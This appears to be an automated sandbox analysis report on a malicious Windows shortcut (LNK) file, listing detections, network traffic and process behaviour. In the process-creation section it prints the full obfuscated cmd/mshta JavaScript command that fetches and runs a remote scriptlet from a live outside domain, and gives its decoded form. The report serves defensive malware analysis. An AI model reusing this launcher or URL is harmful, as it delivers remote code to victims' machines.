Windows Analysis Report
V_273686.Lnk.lnk

Overview

General Information

Sample name: V_273686.Lnk.lnk
Analysis ID: 1446726
MD5: 1dca9e98e575af3b1e2b90e59d75dc43
SHA1: 16cc510d884cae94137a9fbf90c4d2c0f0c5d2f1
SHA256: a89872c21ac68096a76a60e5a13c77ddf79252c3097aea42865879c5b6d452f3
Tags: lnk

Detection

MalLnk
Score: 68
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Yara detected malicious lnk
Machine Learning detection for sample
Creates a process in suspended mode (likely to inject code)
JA3 SSL client fingerprint seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection

Source: V_273686.Lnk.lnk ReversingLabs: Detection: 15%
Source: V_273686.Lnk.lnk Joe Sandbox ML: detected
Source: unknown HTTPS traffic detected: 172.67.217.192:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.15.59.224:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected:
  GET /?2/ HTTP/1.1
  Accept: */*
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: cronal184.phroativa.com.br
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
  GET / HTTP/1.1
  Accept: */*
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Connection: Keep-Alive
  Host: www.wikipedia.org
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: cronal184.phroativa.com.br
Source: global traffic DNS traffic detected: DNS query: www.wikipedia.org
Source: mshta.exe, 00000003.00000003.1233596963.00000290661AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: HTtps://cronal184.phroativa.com.br/?2/
Source: mshta.exe, 00000003.00000002.1236137885.0000028863F3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232784968.0000028863F3E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: HTtps://cronal184.phroativa.com.br/?2/(
Source: mshta.exe, 00000003.00000003.1232082384.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232173549.0000029066210000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231984723.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231870463.0000029066201000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.dr String found in binary or memory: https://creativecommons.org/licenses/by-sa/4.0/
Source: mshta.exe, 00000003.00000003.1232880364.0000028863F87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1236239083.0000028863F8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232642532.0000028863F83000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cronal184.phroativa.com.br/
Source: mshta.exe, 00000003.00000002.1236199318.0000028863F5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232784968.0000028863F3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1233829051.00000290661DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cronal184.phroativa.com.br/?2/
Source: mshta.exe, 00000003.00000002.1236630762.0000029066412000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cronal184.phroativa.com.br/?2/St
Source: mshta.exe, 00000003.00000003.1232642532.0000028863F5D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1236199318.0000028863F5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cronal184.phroativa.com.br/?2/U
Source: mshta.exe, 00000003.00000002.1236137885.0000028863F3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232784968.0000028863F3E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cronal184.phroativa.com.br/?2/l
Source: mshta.exe, 00000003.00000003.1232082384.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232173549.0000029066210000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231984723.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231870463.0000029066201000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.dr String found in binary or memory: https://donate.wikimedia.org/?utm_medium=portal&utm_campaign=portalFooter&utm_source=portalFooter
Source: mshta.exe, 00000003.00000002.1235891376.0000028863EE5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c
Source: mshta.exe, 00000003.00000003.1232880364.0000028863F87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232642532.0000028863F83000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://intake-logging.wikimedia.org/v1/eventsx
Source: mshta.exe, 00000003.00000003.1232082384.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232173549.0000029066210000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231984723.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231870463.0000029066201000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://itunes.apple.com/app/apple-store/id324715238?pt=208305&c
Source: mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.dr String found in binary or memory: https://itunes.apple.com/app/apple-store/id324715238?pt=208305&ct=portal&mt=8
Source: mshta.exe, 00000003.00000003.1232948851.0000028863F93000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1236254485.0000028863F94000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232880364.0000028863F87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232642532.0000028863F83000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: mshta.exe, 00000003.00000003.1232082384.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232173549.0000029066210000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231984723.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231870463.0000029066201000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.dr String found in binary or memory: https://meta.wikimedia.org/wiki/Privacy_policy
Source: mshta.exe, 00000003.00000003.1232082384.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232173549.0000029066210000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231984723.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231870463.0000029066201000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.dr String found in binary or memory: https://meta.wikimedia.org/wiki/Special:MyLanguage/List_of_Wikipedias
Source: mshta.exe, 00000003.00000003.1232082384.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232173549.0000029066210000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231984723.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231870463.0000029066201000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.dr String found in binary or memory: https://meta.wikimedia.org/wiki/Terms_of_use
Source: mshta.exe, 00000003.00000003.1232082384.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232173549.0000029066210000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231984723.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231870463.0000029066201000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.wikip
Source: mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.dr String found in binary or memory: https://play.google.com/store/apps/details?id=org.wikipedia&referrer=utm_source%3Dportal%26utm_mediu
Source: mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.dr String found in binary or memory: https://upload.wikimedia.org/wikipedia/en/thumb/8/80/Wikipedia-logo-v2.svg/2244px-Wikipedia-logo-v2.
Source: mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.dr String found in binary or memory: https://wikis.world/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49701

System Summary

Source: Yara match File source: V_273686.Lnk.lnk, type: SAMPLE
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: classification engine Classification label: mal68.troj.winLNK@4/1@2/2
Source: C:\Windows\System32\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\EJF5C7CA.htm
Source: C:\Windows\System32\conhost.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c MshtA "JaVAsCrIpT:var _$_NXUI=["\x4b\x49\x49\x54\x48\x5a\x4c","\163\x63\162\x69\160\x74\x3a\110\124\x74\x70\163\x3a\x2f\x2f\x63\x72\x6f\156\x61\x6c\x31\70\64\56\x70\x68\162\x6f\x61\x74\x69\166\x61\x2e\x63\157\155\x2e\142\x72\57\x3f\x32\x2f"];try{GetObject(_$_NXUI[1])[_$_NXUI[0]]()}catch(e){};close()"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe MshtA "JaVAsCrIpT:var _$_NXUI=["\x4b\x49\x49\x54\x48\x5a\x4c","\163\x63\162\x69\160\x74\x3a\110\124\x74\x70\163\x3a\x2f\x2f\x63\x72\x6f\156\x61\x6c\x31\70\64\56\x70\x68\162\x6f\x61\x74\x69\166\x61\x2e\x63\157\155\x2e\142\x72\57\x3f\x32\x2f"];try{GetObject(_$_NXUI[1])[_$_NXUI[0]]()}catch(e){};close()"
Note: the two hex/octal-escaped string literals in the mshta command line decode to "KIITHZL" and "script:HTtps://cronal184.phroativa.com.br/?2/", so the script loads a remote scriptlet through GetObject and invokes its KIITHZL method; the same URL is the one found in mshta.exe memory above.
Source: C:\Windows\System32\mshta.exe Section loaded: wldp.dll, mshtml.dll, iertutil.dll, sspicli.dll, powrprof.dll, winhttp.dll, wkscli.dll, netutils.dll, umpdc.dll, urlmon.dll, srvcli.dll, kernel.appcore.dll, msiso.dll, uxtheme.dll, srpapi.dll, msimtf.dll, dxgi.dll, resourcepolicyclient.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll, dataexchange.dll, d3d11.dll, dcomp.dll, twinapi.appcore.dll, jscript9.dll, scrobj.dll, wininet.dll, windows.storage.dll, profapi.dll, ondemandconnroutehelper.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, msasn1.dll, dpapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, ncrypt.dll, ncryptsslp.dll, msls31.dll, d2d1.dll, dwrite.dll, d3d10warp.dll, dxcore.dll
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Persistence and Installation Behavior

Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\mshta.exe
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: mshta.exe, 00000003.00000003.1232948851.0000028863FAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232642532.0000028863FAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1236254485.0000028863FAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232880364.0000028863FAE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: mshta.exe, 00000003.00000003.1232642532.0000028863F5D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1236199318.0000028863F5E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWi>pG
Source: mshta.exe, 00000003.00000003.1232642532.0000028863F5D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1236199318.0000028863F5E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP}
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation